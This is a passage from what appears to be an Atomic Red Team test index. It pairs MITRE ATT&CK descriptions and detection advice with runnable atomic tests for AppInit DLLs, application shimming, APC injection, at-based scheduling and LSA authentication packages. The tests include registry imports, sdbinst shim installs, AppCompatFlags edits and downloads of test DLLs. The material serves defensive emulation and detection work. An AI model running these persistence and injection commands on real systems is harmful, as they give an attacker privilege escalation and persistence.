marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: AppCert DLLs + description: "Adversaries may establish persistence and/or elevate privileges + by executing malicious content triggered by AppCert DLLs loaded into processes. + Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs + Registry key under HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session + Manager\\ are loaded into every process that calls the ubiquitously + used application programming interface (API) functions CreateProcess, + CreateProcessAsUser, CreateProcessWithLoginW, CreateProcessWithTokenW, + or WinExec. (Citation: Elastic Process Injection July 2017)\n\nSimilar + to [Process Injection](https://attack.mitre.org/techniques/T1055), this value + can be abused to obtain elevated privileges by causing a malicious DLL to + be loaded and run in the context of separate processes on the computer. Malicious + AppCert DLLs may also provide persistence by continuously being triggered + by API activity. " + id: attack-pattern--7d57b371-10c2-45e5-b3cc-83a8fb380e4c + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-11-10T18:29:31.052Z' + created: '2020-01-24T14:47:41.795Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_effective_permissions: + - Administrator + - SYSTEM + x_mitre_permissions_required: + - Administrator + - SYSTEM + x_mitre_detection: "Monitor DLL loads by processes, specifically looking for + DLLs that are not recognized or not normally loaded into a process. Monitor + the AppCertDLLs Registry value for modifications that do not correlate with + known software, patch cycles, etc. Monitor and analyze application programming + interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx + and RegSetValueEx. (Citation: Elastic Process Injection July 2017) \n\nTools + such as Sysinternals Autoruns may overlook AppCert DLLs as an auto-starting + location. (Citation: TechNet Autoruns) (Citation: Sysinternals AppCertDlls + Oct 2007)\n\nLook for abnormal process behavior that may be due to a process + loading a malicious DLL. Data and events should not be viewed in isolation, + but as part of a chain of behavior that could lead to other activities, such + as making network connections for Command and Control, learning details about + the environment through Discovery, and conducting Lateral Movement." + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'Command: Command Execution' + - 'Module: Module Load' + x_mitre_platforms: + - Windows + atomic_tests: [] + T1546.010: + technique: + external_references: + - source_name: mitre-attack + external_id: T1546.010 + url: https://attack.mitre.org/techniques/T1546/010 + - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process + description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: + A Technical Survey Of Common And Trending Process Injection Techniques. + Retrieved December 7, 2017.' + source_name: Elastic Process Injection July 2017 + - url: https://support.microsoft.com/en-us/kb/197571 + description: Microsoft. (2006, October). Working with the AppInit_DLLs registry + value. Retrieved July 15, 2015. + source_name: AppInit Registry + - url: https://msdn.microsoft.com/en-us/library/dn280412 + description: Microsoft. (n.d.). AppInit DLLs and Secure Boot. Retrieved July + 15, 2015. + source_name: AppInit Secure Boot + - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 + description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. + Retrieved June 6, 2016. + source_name: TechNet Autoruns + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: AppInit DLLs + description: "Adversaries may establish persistence and/or elevate privileges + by executing malicious content triggered by AppInit DLLs loaded into processes. + Dynamic-link libraries (DLLs) that are specified in the AppInit_DLLs + value in the Registry keys HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows + NT\\CurrentVersion\\Windows or HKEY_LOCAL_MACHINE\\Software\\Wow6432Node\\Microsoft\\Windows + NT\\CurrentVersion\\Windows are loaded by user32.dll into every process + that loads user32.dll. In practice this is nearly every program, since user32.dll + is a very common library. (Citation: Elastic Process Injection July 2017)\n\nSimilar + to Process Injection, these values can be abused to obtain elevated privileges + by causing a malicious DLL to be loaded and run in the context of separate + processes on the computer. (Citation: AppInit Registry) Malicious AppInit + DLLs may also provide persistence by continuously being triggered by API activity. + \n\nThe AppInit DLL functionality is disabled in Windows 8 and later versions + when secure boot is enabled. (Citation: AppInit Secure Boot)" + id: attack-pattern--cc89ecbd-3d33-4a41-bcca-001e702d18fd + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-11-10T18:29:31.076Z' + created: '2020-01-24T14:52:25.589Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_system_requirements: + - Secure boot disabled on systems running Windows 8 and later + x_mitre_effective_permissions: + - Administrator + - SYSTEM + x_mitre_permissions_required: + - Administrator + x_mitre_detection: "Monitor DLL loads by processes that load user32.dll and + look for DLLs that are not recognized or not normally loaded into a process. + Monitor the AppInit_DLLs Registry values for modifications that do not correlate + with known software, patch cycles, etc. Monitor and analyze application programming + interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx + and RegSetValueEx. (Citation: Elastic Process Injection July + 2017)\n\nTools such as Sysinternals Autoruns may also be used to detect system + changes that could be attempts at persistence, including listing current AppInit + DLLs. (Citation: TechNet Autoruns) \n\nLook for abnormal process behavior + that may be due to a process loading a malicious DLL. Data and events should + not be viewed in isolation, but as part of a chain of behavior that could + lead to other activities, such as making network connections for Command and + Control, learning details about the environment through Discovery, and conducting + Lateral Movement." + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'Command: Command Execution' + - 'Module: Module Load' + x_mitre_platforms: + - Windows + identifier: T1546.010 + atomic_tests: + - name: Install AppInit Shim + auto_generated_guid: a58d9386-3080-4242-ab5f-454c16503d18 + description: "AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs + to be loaded into each user mode process on the system. Upon succesfully execution, + \nyou will see the message \"The operation completed successfully.\" Each + time the DLL is loaded, you will see a message box with a message of \"Install + AppInit Shim DLL was called!\" appear.\nThis will happen regularly as your + computer starts up various applications and may in fact drive you crazy. A + reliable way to make the message box appear and verify the \nAppInit Dlls + are loading is to start the notepad application. Be sure to run the cleanup + commands afterwards so you don't keep getting message boxes showing up\n" + supported_platforms: + - windows + input_arguments: + registry_file: + description: Windows Registry File + type: Path + default: PathToAtomicsFolder\T1546.010\src\T1546.010.reg + registry_cleanup_file: + description: Windows Registry File + type: Path + default: PathToAtomicsFolder\T1546.010\src\T1546.010-cleanup.reg + dependency_executor_name: powershell + dependencies: + - description: 'Reg files must exist on disk at specified locations (#{registry_file} + and #{registry_cleanup_file}) + +' + prereq_command: 'if ((Test-Path #{registry_file}) -and (Test-Path #{registry_cleanup_file})) + {exit 0} else {exit 1} + +' + get_prereq_command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + New-Item -Type Directory (split-path #{registry_file}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/src/T1546.010.reg" -OutFile "#{registry_file}" + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/src/T1546.010-cleanup.reg" -OutFile "#{registry_cleanup_file}" + - description: 'DLL''s must exist in the C:\Tools directory (T1546.010.dll and + T1546.010x86.dll) + +' + prereq_command: 'if ((Test-Path c:\Tools\T1546.010.dll) -and (Test-Path c:\Tools\T1546.010x86.dll)) + {exit 0} else {exit 1} + +' + get_prereq_command: | + New-Item -Type Directory C:\Tools -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/bin/T1546.010.dll" -OutFile C:\Tools\T1546.010.dll + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/bin/T1546.010x86.dll" -OutFile C:\Tools\T1546.010x86.dll + executor: + command: 'reg.exe import #{registry_file} + +' + cleanup_command: 'reg.exe import #{registry_cleanup_file} >nul 2>&1 + +' + name: command_prompt + elevation_required: true + T1546.011: + technique: + external_references: + - source_name: mitre-attack + external_id: T1546.011 + url: https://attack.mitre.org/techniques/T1546/011 + - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process + description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: + A Technical Survey Of Common And Trending Process Injection Techniques. + Retrieved December 7, 2017.' + source_name: Elastic Process Injection July 2017 + - source_name: FireEye Application Shimming + url: http://files.brucon.org/2015/Tomczak_and_Ballenthin_Shims_for_the_Win.pdf + description: Ballenthin, W., Tomczak, J.. (2015). The Real Shim Shary. Retrieved + May 4, 2020. + - url: https://www.blackhat.com/docs/eu-15/materials/eu-15-Pierce-Defending-Against-Malicious-Application-Compatibility-Shims-wp.pdf + description: Pierce, Sean. (2015, November). Defending Against Malicious Application + Compatibility Shims. Retrieved June 22, 2017. + source_name: Black Hat 2015 App Shim + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Application Shimming + description: "Adversaries may establish persistence and/or elevate privileges + by executing malicious content triggered by application shims. The Microsoft + Windows Application Compatibility Infrastructure/Framework (Application Shim) + was created to allow for backward compatibility of software as the operating + system codebase changes over time. For example, the application shimming feature + allows developers to apply fixes to applications (without rewriting code) + that were created for Windows XP so that it will work with Windows 10. (Citation: + Elastic Process Injection July 2017)\n\nWithin the framework, shims are created + to act as a buffer between the program (or more specifically, the Import Address + Table) and the Windows OS. When a program is executed, the shim cache is referenced + to determine if the program requires the use of the shim database (.sdb). + If so, the shim database uses hooking to redirect the code as necessary in + order to communicate with the OS. \n\nA list of all shims currently installed + by the default Windows installer (sdbinst.exe) is kept in:\n\n* %WINDIR%\\AppPatch\\sysmain.sdb + and\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\installedsdb\n\nCustom + databases are stored in:\n\n* %WINDIR%\\AppPatch\\custom & %WINDIR%\\AppPatch\\AppPatch64\\Custom + and\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\custom\n\nTo + keep shims secure, Windows designed them to run in user mode so they cannot + modify the kernel and you must have administrator privileges to install a + shim. However, certain shims can be used to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) + (UAC and RedirectEXE), inject DLLs into processes (InjectDLL), disable Data + Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), + and intercept memory addresses (GetProcAddress).\n\nUtilizing these shims + may allow an adversary to perform several malicious acts such as elevate privileges, + install backdoors, disable defenses like Windows Defender, etc. (Citation: + FireEye Application Shimming) Shims can also be abused to establish persistence + by continuously being invoked by affected programs." + id: attack-pattern--42fe883a-21ea-4cfb-b94a-78b6476dcc83 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-11-10T18:29:31.094Z' + created: '2020-01-24T14:56:24.231Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - Administrator + x_mitre_detection: |- + There are several public tools available that will detect shims that are currently available (Citation: Black Hat 2015 App Shim): + + * Shim-Process-Scanner - checks memory of every running process for any shim flags + * Shim-Detector-Lite - detects installation of custom shim databases + * Shim-Guard - monitors registry for any shim installations + * ShimScanner - forensic tool to find active shims in memory + * ShimCacheMem - Volatility plug-in that pulls shim cache from memory (note: shims are only cached after reboot) + + Monitor process execution for sdbinst.exe and command-line arguments for potential indications of application shim abuse. + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'Command: Command Execution' + - 'Module: Module Load' + - 'File: File Modification' + x_mitre_platforms: + - Windows + identifier: T1546.011 + atomic_tests: + - name: Application Shim Installation + auto_generated_guid: 9ab27e22-ee62-4211-962b-d36d9a0e6a18 + description: "Install a shim database. This technique is used for privilege + escalation and bypassing user access control.\nUpon execution, \"Installation + of AtomicShim complete.\" will be displayed. To verify the shim behavior, + run \nthe AtomicTest.exe from the \\\\T1546.011\\\\bin + directory. You should see a message box appear\nwith \"Atomic Shim DLL Test!\" + as defined in the AtomicTest.dll. To better understand what is happening, + review\nthe source code files is the \\\\T1546.011\\\\src + directory.\n" + supported_platforms: + - windows + input_arguments: + file_path: + description: Path to the shim database file + type: String + default: PathToAtomicsFolder\T1546.011\bin\AtomicShimx86.sdb + dependency_executor_name: powershell + dependencies: + - description: 'Shim database file must exist on disk at specified location + (#{file_path}) + +' + prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1} + +' + get_prereq_command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + New-Item -Type Directory (split-path #{file_path}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicShimx86.sdb" -OutFile "#{file_path}" + - description: 'AtomicTest.dll must exist at c:\Tools\AtomicTest.dll + +' + prereq_command: 'if (Test-Path c:\Tools\AtomicTest.dll) {exit 0} else {exit + 1} + +' + get_prereq_command: | + New-Item -Type Directory (split-path c:\Tools\AtomicTest.dll) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicTest.dll" -OutFile c:\Tools\AtomicTest.dll + executor: + command: 'sdbinst.exe #{file_path} + +' + cleanup_command: 'sdbinst.exe -u #{file_path} >nul 2>&1 + +' + name: command_prompt + elevation_required: true + - name: New shim database files created in the default shim database directory + auto_generated_guid: aefd6866-d753-431f-a7a4-215ca7e3f13d + description: | + Upon execution, check the "C:\Windows\apppatch\Custom\" folder for the new shim database + + https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html + supported_platforms: + - windows + executor: + command: | + Copy-Item $PathToAtomicsFolder\T1546.011\bin\T1546.011CompatDatabase.sdb C:\Windows\apppatch\Custom\T1546.011CompatDatabase.sdb + Copy-Item $PathToAtomicsFolder\T1546.011\bin\T1546.011CompatDatabase.sdb C:\Windows\apppatch\Custom\Custom64\T1546.011CompatDatabase.sdb + cleanup_command: | + Remove-Item C:\Windows\apppatch\Custom\T1546.011CompatDatabase.sdb -ErrorAction Ignore + Remove-Item C:\Windows\apppatch\Custom\Custom64\T1546.011CompatDatabase.sdb -ErrorAction Ignore + name: powershell + elevation_required: true + - name: Registry key creation and/or modification events for SDB + auto_generated_guid: 9b6a06f9-ab5e-4e8d-8289-1df4289db02f + description: | + Create registry keys in locations where fin7 typically places SDB patches. Upon execution, output will be displayed describing + the registry keys that were created. These keys can also be viewed using the Registry Editor. + + https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html + supported_platforms: + - windows + executor: + command: | + New-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom" -Name "AtomicRedTeamT1546.011" -Value "AtomicRedTeamT1546.011" + New-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB" -Name "AtomicRedTeamT1546.011" -Value "AtomicRedTeamT1546.011" + cleanup_command: | + Remove-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom" -Name "AtomicRedTeamT1546.011" -ErrorAction Ignore + Remove-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB" -Name "AtomicRedTeamT1546.011" -ErrorAction Ignore + name: powershell + elevation_required: true + T1055.004: + technique: + external_references: + - source_name: mitre-attack + external_id: T1055.004 + url: https://attack.mitre.org/techniques/T1055/004 + - url: https://msdn.microsoft.com/library/windows/desktop/ms681951.aspx + description: Microsoft. (n.d.). Asynchronous Procedure Calls. Retrieved December + 8, 2017. + source_name: Microsoft APC + - url: https://www.cyberbit.com/blog/endpoint-security/new-early-bird-code-injection-technique-discovered/ + description: Gavriel, H. & Erbesfeld, B. (2018, April 11). New ‘Early Bird’ + Code Injection Technique Discovered. Retrieved May 24, 2018. + source_name: CyberBit Early Bird Apr 2018 + - url: https://blog.ensilo.com/atombombing-brand-new-code-injection-for-windows + description: 'Liberman, T. (2016, October 27). ATOMBOMBING: BRAND NEW CODE + INJECTION FOR WINDOWS. Retrieved December 8, 2017.' + source_name: ENSIL AtomBombing Oct 2016 + - url: https://msdn.microsoft.com/library/windows/desktop/ms649053.aspx + description: Microsoft. (n.d.). About Atom Tables. Retrieved December 8, 2017. + source_name: Microsoft Atom Table + - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process + description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: + A Technical Survey Of Common And Trending Process Injection Techniques. + Retrieved December 7, 2017.' + source_name: Elastic Process Injection July 2017 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Asynchronous Procedure Call + description: "Adversaries may inject malicious code into processes via the asynchronous + procedure call (APC) queue in order to evade process-based defenses as well + as possibly elevate privileges. APC injection is a method of executing arbitrary + code in the address space of a separate live process. \n\nAPC injection is + commonly performed by attaching malicious code to the APC Queue (Citation: + Microsoft APC) of a process's thread. Queued APC functions are executed when + the thread enters an alterable state.(Citation: Microsoft APC) A handle to + an existing victim process is first created with native Windows API calls + such as OpenThread. At this point QueueUserAPC can + be used to invoke a function (such as LoadLibrayA pointing to + a malicious DLL). \n\nA variation of APC injection, dubbed \"Early Bird injection\", + involves creating a suspended process in which malicious code can be written + and executed before the process' entry point (and potentially subsequent anti-malware + hooks) via an APC. (Citation: CyberBit Early Bird Apr 2018) AtomBombing (Citation: + ENSIL AtomBombing Oct 2016) is another variation that utilizes APCs to invoke + malicious code previously written to the global atom table.(Citation: Microsoft + Atom Table)\n\nRunning code in the context of another process may allow access + to the process's memory, system/network resources, and possibly elevated privileges. + Execution via APC injection may also evade detection from security products + since the execution is masked under a legitimate process. " + id: attack-pattern--7c0f17c9-1af6-4628-9cbd-9e45482dd605 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-11-10T18:29:30.961Z' + created: '2020-01-14T01:29:43.786Z' + x_mitre_defense_bypassed: + - Application control + - Anti-virus + x_mitre_data_sources: + - 'Process: OS API Execution' + - 'Process: Process Access' + x_mitre_detection: "Monitoring Windows API calls indicative of the various types + of code injection may generate a significant amount of data and may not be + directly useful for defense unless collected under specific circumstances + for known bad sequences of calls, since benign use of API functions may be + common and difficult to distinguish from malicious behavior. Windows API calls + such as SuspendThread/SetThreadContext/ResumeThread, + QueueUserAPC/NtQueueApcThread, and those that can + be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, + may be used for this technique.(Citation: Elastic Process Injection July 2017)\n\nAnalyze + process behavior to determine if a process is performing actions it usually + does not, such as opening network connections, reading files, or other suspicious + actions that could relate to post-compromise behavior. " + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - Windows + identifier: T1055.004 + atomic_tests: + - name: Process Injection via C# + auto_generated_guid: 611b39b7-e243-4c81-87a4-7145a90358b1 + description: | + Process Injection using C# + reference: https://github.com/pwndizzle/c-sharp-memory-injection + Excercises Five Techniques + 1. Process injection + 2. ApcInjectionAnyProcess + 3. ApcInjectionNewProcess + 4. IatInjection + 5. ThreadHijack + Upon successful execution, cmd.exe will execute T1055.exe, which exercises 5 techniques. Output will be via stdout. + supported_platforms: + - windows + input_arguments: + exe_binary: + description: Output Binary + type: Path + default: PathToAtomicsFolder\T1055.004\bin\T1055.exe + executor: + command: "#{exe_binary}\n" + name: command_prompt + T1053.001: + technique: + external_references: + - source_name: mitre-attack + external_id: T1053.001 + url: https://attack.mitre.org/techniques/T1053/001 + - source_name: Kifarunix - Task Scheduling in Linux + url: https://kifarunix.com/scheduling-tasks-using-at-command-in-linux/ + description: Koromicha. (2019, September 7). Scheduling tasks using at command + in Linux. Retrieved December 3, 2019. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: At (Linux) + description: |- + Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) command within Linux operating systems enables administrators to schedule tasks.(Citation: Kifarunix - Task Scheduling in Linux) + + An adversary may use [at](https://attack.mitre.org/software/S0110) in Linux environments to execute programs at system startup or on a scheduled basis for persistence. [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account. + id: attack-pattern--6636bc83-0611-45a6-b74f-1f3daf635b8e + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: execution + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-03-23T22:35:13.112Z' + created: '2019-12-03T12:59:36.749Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_remote_support: true + x_mitre_detection: "Monitor scheduled task creation using command-line invocation. + Legitimate scheduled tasks may be created during installation of new software + or through system administration functions. Look for changes to tasks that + do not correlate with known software, patch cycles, etc. \n\nSuspicious program + execution through scheduled tasks may show up as outlier processes that have + not been seen before when compared against historical data. Data and events + should not be viewed in isolation, but as part of a chain of behavior that + could lead to other activities, such as network connections made for Command + and Control, learning details about the environment through Discovery, and + Lateral Movement." + x_mitre_data_sources: + - 'Scheduled Job: Scheduled Job Creation' + - 'Command: Command Execution' + - 'Process: Process Creation' + x_mitre_platforms: + - Linux + identifier: T1053.001 + atomic_tests: + - name: At - Schedule a job + auto_generated_guid: 7266d898-ac82-4ec0-97c7-436075d0d08e + description: 'This test submits a command to be run in the future by the `at` + daemon. + +' + supported_platforms: + - linux + input_arguments: + time_spec: + description: Time specification of when the command should run + type: String + default: now + 1 minute + at_command: + description: The command to be run + type: String + default: echo Hello from Atomic Red Team + dependency_executor_name: sh + dependencies: + - description: 'The `at` and `atd` executables must exist in the PATH + +' + prereq_command: 'which at && which atd + +' + get_prereq_command: 'echo ''Please install `at` and `atd`; they were not found + in the PATH (Package name: `at`)'' + +' + - description: 'The `atd` daemon must be running + +' + prereq_command: 'systemctl status atd || service atd status + +' + get_prereq_command: 'echo ''Please start the `atd` daemon (sysv: `service + atd start` ; systemd: `systemctl start atd`)'' + +' + executor: + name: sh + elevation_required: false + command: 'echo "#{at_command}" | at #{time_spec} + +' + T1053.002: + technique: + external_references: + - source_name: mitre-attack + external_id: T1053.002 + url: https://attack.mitre.org/techniques/T1053/002 + - url: https://twitter.com/leoloobeek/status/939248813465853953 + description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved + December 12, 2017. + source_name: Twitter Leoloobeek Scheduled Task + - url: https://social.technet.microsoft.com/Forums/en-US/e5bca729-52e7-4fcb-ba12-3225c564674c/scheduled-tasks-history-retention-settings?forum=winserver8gen + description: Satyajit321. (2015, November 3). Scheduled Tasks History Retention + settings. Retrieved December 12, 2017. + source_name: TechNet Forum Scheduled Task Operational Setting + - url: https://technet.microsoft.com/library/dd315590.aspx + description: Microsoft. (n.d.). General Task Registration. Retrieved December + 12, 2017. + source_name: TechNet Scheduled Task Events + - source_name: Microsoft Scheduled Task Events Win10 + url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-object-access-events + description: Microsoft. (2017, May 28). Audit Other Object Access Events. + Retrieved June 27, 2019. + - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 + description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. + Retrieved June 6, 2016. + source_name: TechNet Autoruns + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: At (Windows) + description: "Adversaries may abuse the at.exe utility to perform + task scheduling for initial or recurring execution of malicious code. The + [at](https://attack.mitre.org/software/S0110) utility exists as an executable + within Windows for scheduling tasks at a specified time and date. Using [at](https://attack.mitre.org/software/S0110) + requires that the Task Scheduler service be running, and the user to be logged + on as a member of the local Administrators group. \n\nAn adversary may use + at.exe in Windows environments to execute programs at system + startup or on a scheduled basis for persistence. [at](https://attack.mitre.org/software/S0110) + can also be abused to conduct remote Execution as part of Lateral Movement + and or to run a process under the context of a specified account (such as + SYSTEM).\n\nNote: The at.exe command line utility has been deprecated + in current versions of Windows in favor of schtasks." + id: attack-pattern--f3d95a1f-bba2-44ce-9af7-37866cd63fd0 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: execution + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-03-24T13:43:40.776Z' + created: '2019-11-27T13:52:45.853Z' + x_mitre_data_sources: + - 'Scheduled Job: Scheduled Job Creation' + - 'Command: Command Execution' + - 'File: File Modification' + - 'Process: Process Creation' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_remote_support: true + x_mitre_permissions_required: + - Administrator + x_mitre_detection: |- + Monitor process execution from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in %systemroot%\System32\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc. + + Configure event logging for scheduled task creation and changes by enabling the "Microsoft-Windows-TaskScheduler/Operational" setting within the event logging service. (Citation: TechNet Forum Scheduled Task Operational Setting) Several events will then be logged on scheduled task activity, including: (Citation: TechNet Scheduled Task Events)(Citation: Microsoft Scheduled Task Events Win10) + + * Event ID 106 on Windows 7, Server 2008 R2 - Scheduled task registered + * Event ID 140 on Windows 7, Server 2008 R2 / 4702 on Windows 10, Server 2016 - Scheduled task updated + * Event ID 141 on Windows 7, Server 2008 R2 / 4699 on Windows 10, Server 2016 - Scheduled task deleted + * Event ID 4698 on Windows 10, Server 2016 - Scheduled task created + * Event ID 4700 on Windows 10, Server 2016 - Scheduled task enabled + * Event ID 4701 on Windows 10, Server 2016 - Scheduled task disabled + + Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns) + + Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data. + x_mitre_platforms: + - Windows + identifier: T1053.002 + atomic_tests: + - name: At.exe Scheduled task + auto_generated_guid: 4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8 + description: | + Executes cmd.exe + Note: deprecated in Windows 8+ + + Upon successful execution, cmd.exe will spawn at.exe and create a scheduled task that will spawn cmd at a specific time. + supported_platforms: + - windows + executor: + name: command_prompt + elevation_required: false + command: 'at 13:20 /interactive cmd + +' + T1547.002: + technique: + id: attack-pattern--b8cfed42-6a8a-4989-ad72-541af74475ec + description: |- + Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system. (Citation: MSDN Authentication Packages) + + Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ with the key value of "Authentication Packages"=<target binary>. The binary will then be executed by the system when the authentication packages are loaded. + name: Authentication Package + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1547.002 + url: https://attack.mitre.org/techniques/T1547/002 + - url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx + description: Microsoft. (n.d.). Authentication Packages. Retrieved March 1, + 2017. + source_name: MSDN Authentication Packages + - url: http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html + description: Graeber, M. (2014, October). Analysis of Malicious Security Support + Provider DLLs. Retrieved March 1, 2017. + source_name: Graeber 2014 + - url: https://technet.microsoft.com/en-us/library/dn408187.aspx + description: Microsoft. (2013, July 31). Configuring Additional LSA Protection. + Retrieved June 24, 2015. + source_name: Microsoft Configure LSA + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-03-25T15:11:25.821Z' + created: '2020-01-24T14:54:42.757Z' + x_mitre_platforms: + - Windows + x_mitre_data_sources: + - 'Windows Registry: Windows Registry Key Modification' + - 'Module: Module Load' + - 'Command: Command Execution' + x_mitre_detection: 'Monitor the Registry for changes to the LSA Registry keys. + Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 + R2 may generate events when unsigned DLLs try to load into the LSA by setting + the Registry key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image + File Execution Options\LSASS.exe with AuditLevel = 8. (Citation: Graeber + 2014) (Citation: Microsoft Configure LSA)' + x_mitre_permissions_required: + - Administrator + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + atomic_tests: [] + T1547: + technique: + id: 